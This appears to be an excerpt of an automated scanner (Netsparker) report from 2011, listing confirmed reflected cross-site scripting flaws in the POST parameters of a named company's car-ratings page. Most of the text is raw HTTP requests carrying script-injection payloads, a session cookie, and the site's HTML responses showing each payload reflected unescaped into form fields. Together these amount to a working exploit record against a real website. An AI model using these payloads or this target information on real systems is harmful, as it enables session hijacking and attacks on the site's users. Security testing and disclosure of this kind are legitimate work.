Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0008D0)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:41:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="'"--></style></script><script>netsparker(0x0008D0)</script>" />
<input type="hidden" name="mk1" id="mk1" value="3" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list"..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x0008D1)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0008D1)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:41:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
<table width="100%" class="text" cellpadding="5">
<tr>
<td width="150" align="left" valign="top"><div class="sidemenu_head">RESEARCH</div><div class="sidemenu_item"><a href="research.php">Overview</a></div><div class="sidemenu_item"> <a href="auto_research.php">Automotive</a></div><div class="sidemenu_item"><a href="govt_research.php">Government</a></div><div class="sidemenu_item"><a href="jury_research.php">Jury</a></div><div class="sidemenu_item"><a href="org_intervention.php">Organizational Intervention</a></div><div class="sidemenu_item"><a href="via_research.php">Values In America</a></div><div class="sidemenu_item"><a href="method.php">ValueCentered Method</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /></td>
<td align="left" valign="top">
<!-- Start the content -->
<div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="middle" />&nbsp;Automotive Ratings</div>
<div class="pagetext">

<p>Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p>
<p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."</p>

<p class="boldtext">View the top winners</p>
<ul>
<li><a href="auto_tqa_winners.php">Total Quality Winners</a></li>
<!-- <li><a href="auto_tva_winners.php">Total Value Winners</a></li> -->
<!--<li><a href="auto_mdv_winners.php">Most Delightful Winners</a></li>-->
<!--<li><a href="auto_pim_winners.php">Problem Impact Measure Winners</a></li>-->
</ul>

<div id="fieldset">
<div class="pagetitle_small">Select a car</div>
<form name="ratingsSelection" action="ratings.php" method="post">
<table border="0" cellpadding="2" cellspacing="0" class="text">
<tr>
<td width="65">Year</td>
<td width="135">Manufacturer</td>
<td colspan="2" width="200">Model</td>
</tr>
<tr>
<td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr>
</table>

<div class="pagesubtitle">Cars you have selected</div>

<input type="hidden" name="numCars" id="numCars" size="1" value="3" />

<input type="hidden" name="yr1" id="yr1" value="3" />
<input type="hidden" name="mk1" id="mk1" value="'"--></style></script><script>netsparker(0x0008D1)</script>" />
<input type="hidden" name="mo1" id="mo1" value="3" />

<input type="hidden" name="yr2" id="yr2" value="3" />
<input type="hidden" name="mk2" id="mk2" value="3" />
<input type="hidden" name="mo2" id="mo2" value="3" />

<input type="hidden" name="yr3" id="yr3" value="" />
<input type="hidden" name="mk3" id="mk3" value="" />
<input type="hidden" name="mo3" id="mo3" value="" />

<input type="hidden" name="yr4" id="yr4" value="" />
<input type="hidden" name="mk4" id="mk4" value="" />
<input type="hidden" name="mo4" id="mo4" value="" />

<input type="hidden" name="yr5" id="yr5" value="" />
<input type="hidden" name="mk5" id="mk5" value="" />
<input type="hidden" name="mo5" id="mo5" value="" />

</form>

<table border="0" class="text boldtext">
<tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>2.</td><td><span id="car2"></span></td><td><span id="car2remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(2);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>3.</td><td><span id="car3"></span></td><td><span id="car3remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(3);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr>
<tr><td>4.</td><td><span id="car4"></span></td><td><span id="car4remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(4);" class="removeCarLink" title="Click here to remove this car from the list"..
- /ratings.php

/ratings.php CONFIRMED

http://www.strategicvision.com/ratings.php

Parameters

Parameter Type Value
Year POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST '"--></style></script><script>alert(0x0008D2)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /ratings.php HTTP/1.1
Referer: http://www.strategicvision.com/ratings.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=vc79hagebb30pt9ttmk65djgu6
Content-Length: 190
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0008D2)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:41:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html



<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Strategic Vision - Automotive Ratings</title>
<script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script>
<!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div>
